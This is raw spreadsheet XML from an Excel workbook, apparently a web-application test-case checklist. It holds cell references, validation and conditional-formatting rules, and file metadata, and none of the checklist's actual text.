    <row r="133" spans="1:5" ht="36.75" x14ac:dyDescent="0.25">
      <c r="A133" s="20">
        <v>12.09</v>
      </c>
      <c r="B133" s="10" t="s">
        <v>263</v>
      </c>
      <c r="C133" s="9" t="s">
        <v>264</v>
      </c>
      <c r="D133" s="12" t="s">
        <v>265</v>
      </c>
      <c r="E133" s="8"/>
    </row>
    <row r="134" spans="1:5" ht="60.75" x14ac:dyDescent="0.25">
      <c r="A134" s="21">
        <v>12.1</v>
      </c>
      <c r="B134" s="10" t="s">
        <v>266</v>
      </c>
      <c r="C134" s="9" t="s">
        <v>267</v>
      </c>
      <c r="D134" s="12" t="s">
        <v>268</v>
      </c>
      <c r="E134" s="8"/>
    </row>
    <row r="135" spans="1:5" ht="48.75" x14ac:dyDescent="0.25">
      <c r="A135" s="20">
        <v>12.11</v>
      </c>
      <c r="B135" s="10" t="s">
        <v>269</v>
      </c>
      <c r="C135" s="9" t="s">
        <v>270</v>
      </c>
      <c r="D135" s="12" t="s">
        <v>177</v>
      </c>
      <c r="E135" s="8"/>
    </row>
    <row r="136" spans="1:5" ht="36.75" x14ac:dyDescent="0.25">
      <c r="A136" s="21">
        <v>12.12</v>
      </c>
      <c r="B136" s="10" t="s">
        <v>271</v>
      </c>
      <c r="C136" s="9" t="s">
        <v>272</v>
      </c>
      <c r="D136" s="12" t="s">
        <v>273</v>
      </c>
      <c r="E136" s="8"/>
    </row>
    <row r="137" spans="1:5" x14ac:dyDescent="0.25">
      <c r="B137" s="11"/>
    </row>
    <row r="138" spans="1:5" ht="18" x14ac:dyDescent="0.25">
      <c r="A138" s="1">
        <v>13</v>
      </c>
      <c r="B138" s="1" t="s">
        <v>278</v>
      </c>
    </row>
    <row r="139" spans="1:5" x14ac:dyDescent="0.25">
      <c r="B139" s="11"/>
    </row>
    <row r="140" spans="1:5" x14ac:dyDescent="0.25">
      <c r="B140" s="11"/>
    </row>
  </sheetData>
  <dataValidations count="2">
    <dataValidation errorStyle="information" allowBlank="1" showInputMessage="1" showErrorMessage="1" promptTitle="result" sqref="E110:E120 E72:E97 E104:E108 E99:E102 E40:E52 E61:E70 E54:E59 D6:D12 E32:E38 E25:E30 E17:E23 E123:E136" xr:uid="{BED7A6EE-C80B-4730-8EB6-578752458DAE}"/>
    <dataValidation type="list" errorStyle="information" allowBlank="1" showInputMessage="1" showErrorMessage="1" promptTitle="result" sqref="D13" xr:uid="{EBDAE0D2-03F6-4D51-8174-A606B395DDE0}">
      <formula1>$B$137:$B$140</formula1>
    </dataValidation>
  </dataValidations>
  <hyperlinks>
    <hyperlink ref="D18" r:id="rId1" xr:uid="{6F6B612E-474B-466F-9C34-D383C186DE47}"/>
  </hyperlinks>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup orientation="portrait" r:id="rId2"/>
  <tableParts count="12">
    <tablePart r:id="rId3"/>
    <tablePart r:id="rId4"/>
    <tablePart r:id="rId5"/>
    <tablePart r:id="rId6"/>
    <tablePart r:id="rId7"/>
    <tablePart r:id="rId8"/>
    <tablePart r:id="rId9"/>
    <tablePart r:id="rId10"/>
    <tablePart r:id="rId11"/>
    <tablePart r:id="rId12"/>
    <tablePart r:id="rId13"/>
    <tablePart r:id="rId14"/>
  </tableParts>
  <extLst>
    <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{78C0D931-6437-407d-A8EE-F0AAD7539E65}">
      <x14:conditionalFormattings>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="containsText" priority="65" operator="containsText" id="{50453300-1EB0-431F-9457-BBF2F0F1006B}">
            <xm:f>NOT(ISERROR(SEARCH($B$140,D6)))</xm:f>
            <xm:f>$B$140</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="66" operator="containsText" id="{A8FD037C-AFCA-40DF-8186-62233C66EBAF}">
            <xm:f>NOT(ISERROR(SEARCH($B$139,D6)))</xm:f>
            <xm:f>$B$139</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="67" operator="containsText" id="{2BEFEC58-B8F6-42B9-95BB-1B1070750A68}">
            <xm:f>NOT(ISERROR(SEARCH($B$138,D6)))</xm:f>
            <xm:f>$B$138</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="68" operator="containsText" id="{E19BA553-17BB-402E-AF62-D59A2BF9B046}">
            <xm:f>NOT(ISERROR(SEARCH($B$137,D6)))</xm:f>
            <xm:f>$B$137</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>E106:E108 E101:E102 E27:E30 E56:E59 E42:E49 E17:E23 D6:D10 E74:E97 E34:E38 E112:E120 E63:E70</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="containsText" priority="53" operator="containsText" id="{839424CC-0917-402D-ADD5-5C972187BB8A}">
            <xm:f>NOT(ISERROR(SEARCH($B$140,E125)))</xm:f>
            <xm:f>$B$140</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="54" operator="containsText" id="{043A8225-0BF1-450B-95DD-474D63754158}">
            <xm:f>NOT(ISERROR(SEARCH($B$139,E125)))</xm:f>
            <xm:f>$B$139</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="55" operator="containsText" id="{ED33E159-8899-4A5E-B174-4E997022C50B}">
            <xm:f>NOT(ISERROR(SEARCH($B$138,E125)))</xm:f>
            <xm:f>$B$138</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="56" operator="containsText" id="{96E2B099-9512-4A2E-A39B-A1643EBA28CC}">
            <xm:f>NOT(ISERROR(SEARCH($B$137,E125)))</xm:f>
            <xm:f>$B$137</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>E125:E136</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="containsText" priority="41" operator="containsText" id="{8C004110-1849-4644-9A37-FF1B9E9F833C}">
            <xm:f>NOT(ISERROR(SEARCH($B$140,D10)))</xm:f>
            <xm:f>$B$140</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="42" operator="containsText" id="{4CB6CEAD-2828-4D84-8FDA-0B9E06694059}">
            <xm:f>NOT(ISERROR(SEARCH($B$139,D10)))</xm:f>
            <xm:f>$B$139</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="43" operator="containsText" id="{C3F169D8-1B32-49A7-95B6-C4575CBD653D}">
            <xm:f>NOT(ISERROR(SEARCH($B$138,D10)))</xm:f>
            <xm:f>$B$138</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="44" operator="containsText" id="{32CA9A26-B0AF-4FF5-8E50-A1269439AADD}">
            <xm:f>NOT(ISERROR(SEARCH($B$137,D10)))</xm:f>
            <xm:f>$B$137</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>D10</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="containsText" priority="37" operator="containsText" id="{454292CB-E762-4E88-9B11-B1E9FC63DFB0}">
            <xm:f>NOT(ISERROR(SEARCH($B$140,D10)))</xm:f>
            <xm:f>$B$140</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="38" operator="containsText" id="{29DEDCA2-E7D5-4FCE-AEDF-8B81C8482804}">
            <xm:f>NOT(ISERROR(SEARCH($B$139,D10)))</xm:f>
            <xm:f>$B$139</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="39" operator="containsText" id="{A5C169E0-5F7D-4544-915C-58CE1C5C9FA4}">
            <xm:f>NOT(ISERROR(SEARCH($B$138,D10)))</xm:f>
            <xm:f>$B$138</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="40" operator="containsText" id="{EFFA86C7-4887-4881-85F9-81A352FEEBBD}">
            <xm:f>NOT(ISERROR(SEARCH($B$137,D10)))</xm:f>
            <xm:f>$B$137</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>D10</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="containsText" priority="33" operator="containsText" id="{48EC7662-871A-49D1-A12D-3EB2C7294FFD}">
            <xm:f>NOT(ISERROR(SEARCH($B$140,D11)))</xm:f>
            <xm:f>$B$140</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="34" operator="containsText" id="{46C6F359-C586-4E1D-A8AB-7D9F7D90AF0F}">
            <xm:f>NOT(ISERROR(SEARCH($B$139,D11)))</xm:f>
            <xm:f>$B$139</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="35" operator="containsText" id="{3C0D6A42-7E95-4C94-945B-FB4A6A2E84BE}">
            <xm:f>NOT(ISERROR(SEARCH($B$138,D11)))</xm:f>
            <xm:f>$B$138</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="36" operator="containsText" id="{0CC483B1-6761-45CF-9AEC-5A2A971EB064}">
            <xm:f>NOT(ISERROR(SEARCH($B$137,D11)))</xm:f>
            <xm:f>$B$137</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>D11:D12</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="containsText" priority="29" operator="containsText" id="{5381E248-D788-40CE-96A3-43C7F5B7B937}">
            <xm:f>NOT(ISERROR(SEARCH($B$140,D11)))</xm:f>
            <xm:f>$B$140</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="30" operator="containsText" id="{B76EC0AF-027D-453B-AC3F-E5BC714AC332}">
            <xm:f>NOT(ISERROR(SEARCH($B$139,D11)))</xm:f>
            <xm:f>$B$139</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="31" operator="containsText" id="{14CD0233-0D86-4D15-AD52-C4E58744FEAC}">
            <xm:f>NOT(ISERROR(SEARCH($B$138,D11)))</xm:f>
            <xm:f>$B$138</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="32" operator="containsText" id="{8D09A2E0-4C20-45F3-A67D-E8C82B78C789}">
            <xm:f>NOT(ISERROR(SEARCH($B$137,D11)))</xm:f>
            <xm:f>$B$137</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>D11:D12</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="containsText" priority="25" operator="containsText" id="{57BB6500-4C59-45AD-8EE8-4D50FEFEE942}">
            <xm:f>NOT(ISERROR(SEARCH($B$140,D11)))</xm:f>
            <xm:f>$B$140</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="26" operator="containsText" id="{B26FE277-3248-4E11-819D-A6E4E56AC74A}">
            <xm:f>NOT(ISERROR(SEARCH($B$139,D11)))</xm:f>
            <xm:f>$B$139</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="27" operator="containsText" id="{EA1101D8-1C9D-4FFD-A27D-010F225EB2C2}">
            <xm:f>NOT(ISERROR(SEARCH($B$138,D11)))</xm:f>
            <xm:f>$B$138</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="28" operator="containsText" id="{D9D0DAB0-E67F-4B0D-8803-743F3B5CA052}">
            <xm:f>NOT(ISERROR(SEARCH($B$137,D11)))</xm:f>
            <xm:f>$B$137</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>D11:D12</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="containsText" priority="17" operator="containsText" id="{AD6F8D85-81AC-49B4-90F2-6A895C926C15}">
            <xm:f>NOT(ISERROR(SEARCH($B$140,D5)))</xm:f>
            <xm:f>$B$140</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="18" operator="containsText" id="{C0D035F0-0344-44DC-82E7-3D1F9D66B316}">
            <xm:f>NOT(ISERROR(SEARCH($B$139,D5)))</xm:f>
            <xm:f>$B$139</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="19" operator="containsText" id="{BF92593D-EC76-416D-A512-C7D1C60D7E97}">
            <xm:f>NOT(ISERROR(SEARCH($B$138,D5)))</xm:f>
            <xm:f>$B$138</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="20" operator="containsText" id="{98C8C682-7D48-41B4-9BA5-43D57115B9D6}">
            <xm:f>NOT(ISERROR(SEARCH($B$137,D5)))</xm:f>
            <xm:f>$B$137</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>D5</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="containsText" priority="13" operator="containsText" id="{24F0CE38-E4A6-4A14-9D13-725FE6B9EBA6}">
            <xm:f>NOT(ISERROR(SEARCH($B$140,E50)))</xm:f>
            <xm:f>$B$140</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="14" operator="containsText" id="{B9B326C3-D623-4794-9C4B-957E9FE6042F}">
            <xm:f>NOT(ISERROR(SEARCH($B$139,E50)))</xm:f>
            <xm:f>$B$139</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="15" operator="containsText" id="{3DA147B6-AC68-433A-B76D-F726F9AE1724}">
            <xm:f>NOT(ISERROR(SEARCH($B$138,E50)))</xm:f>
            <xm:f>$B$138</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="16" operator="containsText" id="{7D050D72-1985-44AD-BDC6-DB9B51F3E6D5}">
            <xm:f>NOT(ISERROR(SEARCH($B$137,E50)))</xm:f>
            <xm:f>$B$137</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>E50</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="containsText" priority="9" operator="containsText" id="{7F187556-C29C-40E8-8ADA-90AF4C0C6F1F}">
            <xm:f>NOT(ISERROR(SEARCH($B$140,E51)))</xm:f>
            <xm:f>$B$140</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="10" operator="containsText" id="{8A7F964E-5B20-4B96-85CB-748003334297}">
            <xm:f>NOT(ISERROR(SEARCH($B$139,E51)))</xm:f>
            <xm:f>$B$139</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="11" operator="containsText" id="{8576DDDB-DBBC-4D65-852D-EFA20911ADA0}">
            <xm:f>NOT(ISERROR(SEARCH($B$138,E51)))</xm:f>
            <xm:f>$B$138</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="12" operator="containsText" id="{E288F13D-6EA8-4400-BD38-08C0E285B392}">
            <xm:f>NOT(ISERROR(SEARCH($B$137,E51)))</xm:f>
            <xm:f>$B$137</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>E51</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="containsText" priority="1" operator="containsText" id="{9DE1B233-21B5-4BF6-ADD8-5AF418F3CD82}">
            <xm:f>NOT(ISERROR(SEARCH($B$140,E52)))</xm:f>
            <xm:f>$B$140</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="2" operator="containsText" id="{5CBDE4A0-111F-4328-93C9-ACDA79CF18CE}">
            <xm:f>NOT(ISERROR(SEARCH($B$139,E52)))</xm:f>
            <xm:f>$B$139</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="3" operator="containsText" id="{8F901092-AD88-448B-9A59-5BF4C0CE8DD5}">
            <xm:f>NOT(ISERROR(SEARCH($B$138,E52)))</xm:f>
            <xm:f>$B$138</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="4" operator="containsText" id="{6EE84651-951A-4287-BEC4-9E62467B5D21}">
            <xm:f>NOT(ISERROR(SEARCH($B$137,E52)))</xm:f>
            <xm:f>$B$137</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>E52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5BB7B-3D4A-4080-9BBF-E130F5F0A1EA}">
  <dimension ref="B3:C7"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="C8" sqref="C8"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="3" spans="2:3" x14ac:dyDescent="0.25">
      <c r="C3" t="s">
        <v>279</v>
      </c>
    </row>
    <row r="4" spans="2:3" x14ac:dyDescent="0.25">
      <c r="B4">
        <v>1</v>
      </c>
      <c r="C4" t="s">
        <v>283</v>
      </c>
    </row>
    <row r="5" spans="2:3" x14ac:dyDescent="0.25">
      <c r="B5">
        <v>2</v>
      </c>
      <c r="C5" t="s">
        <v>284</v>
      </c>
    </row>
    <row r="6" spans="2:3" x14ac:dyDescent="0.25">
      <c r="B6">
        <v>3</v>
      </c>
      <c r="C6" t="s">
        <v>282</v>
      </c>
    </row>
    <row r="7" spans="2:3" x14ac:dyDescent="0.25">
      <c r="B7">
        <v>4</v>
      </c>
      <c r="C7" t="s">
        <v>285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C75CA-5C5F-4709-AA4F-54F9C7F4383E}">
  <dimension ref="D3:D10"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="D11" sqref="D11"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="3" spans="4:4" x14ac:dyDescent="0.25">
      <c r="D3" t="s">
        <v>280</v>
      </c>
    </row>
    <row r="5" spans="4:4" x14ac:dyDescent="0.25">
      <c r="D5" t="s">
        <v>286</v>
      </c>
    </row>
    <row r="6" spans="4:4" x14ac:dyDescent="0.25">
      <c r="D6" t="s">
        <v>287</v>
      </c>
    </row>
    <row r="7" spans="4:4" x14ac:dyDescent="0.25">
      <c r="D7" t="s">
        <v>288</v>
      </c>
    </row>
    <row r="8" spans="4:4" x14ac:dyDescent="0.25">
      <c r="D8" t="s">
        <v>289</v>
      </c>
    </row>
    <row r="9" spans="4:4" x14ac:dyDescent="0.25">
      <c r="D9" t="s">
        <v>290</v>
      </c>
    </row>
    <row r="10" spans="4:4" x14ac:dyDescent="0.25">
      <c r="D10" t="s">
        <v>291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CBFEC-A30D-4293-8DC3-34E24C86DD99}">
  <dimension ref="D4:D8"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="D9" sqref="D9"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="4" spans="4:4" x14ac:dyDescent="0.25">
      <c r="D4" t="s">
        <v>281</v>
      </c>
    </row>
    <row r="6" spans="4:4" x14ac:dyDescent="0.25">
      <c r="D6" t="s">
        <v>292</v>
      </c>
    </row>
    <row r="7" spans="4:4" x14ac:dyDescent="0.25">
      <c r="D7" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="8" spans="4:4" x14ac:dyDescent="0.25">
      <c r="D8" t="s">
        <v>294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Web Application Test case</vt:lpstr>
      <vt:lpstr>Basic</vt:lpstr>
      <vt:lpstr>intermidater</vt:lpstr>
      <vt:lpstr>Advance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NTS-006</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Vikramjeetsingh Kauldhar</cp:lastModifiedBy>
  <cp:revision/>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-03-31T06:12:43Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-28T07:54:35Z</dcterms:modified>
  <cp:category/>
  <cp:contentStatus/>
</cp:coreProperties>
</file>